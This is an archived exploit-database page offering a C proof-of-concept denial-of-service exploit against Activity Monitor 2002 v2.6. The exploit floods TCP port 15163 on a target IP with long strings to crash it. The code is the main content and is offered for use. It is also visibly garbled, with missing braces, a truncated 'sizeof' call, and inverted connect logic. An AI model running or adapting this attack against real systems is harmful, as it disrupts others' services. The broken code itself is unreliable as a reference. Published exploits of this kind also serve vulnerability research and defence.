logo Home

Untitled Document

Home > Archives Exploits > Exploits

Untitled Document

Activity Monitor 2002 remote Denial of Service exploit
Date: 2003-05-30

Author : Luca Ercoli <luca.ercoli@inwind.it>
Download : http://www.security-corporation.com/assets/security/download/exploit/actmonitor2002.c

Overview: "Activity Monitor 2002 is a monitoring software system for real
time employee monitoring and continuous tracking of users activities on
networked computers."
More information can be found at www.softactivity.com

Vulnerability Description: By connecting TCP port 15163 and sending a long
string, a remote attacker could cause the application to crash
and exhaust CPU resources.

Affected Software: Activity Monitor 2002 ver. 2.6


#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>

int main(int argc, char **argv)

int i,ck,port,sd;
char dos[10000];

struct sockaddr_in act_mon_server;

if(argc < 2)
printf("\nUsage: %s <ip>\n", argv[0]);

port = 15163;

for(i = 0; i < 10000; i++) dos[i] = 'x';

act_mon_server.sin_family = AF_INET;
act_mon_server.sin_port = htons((u_short)port);
act_mon_server.sin_addr.s_addr = (long)inet_addr(argv[1]);

sd = socket(AF_INET, SOCK_STREAM, 0);

ck = connect(sd, (struct sockaddr *) &act_mon_server, sizeof

if(ck != 0) {

printf("\n\t\tProof of Concept Activity Monitor 2002 DoS\n");
printf("\t\tby Luca Ercoli luca.ercoli@inwind.it\n\n");

write(sd, dos, sizeof(dos));
write(sd, dos, sizeof(dos));
write(sd, dos, sizeof(dos));

printf("\nDoS sent!\n");



Any use of these codes are at the user's own responsibility.


arrowSearch Advisories


Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.


About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy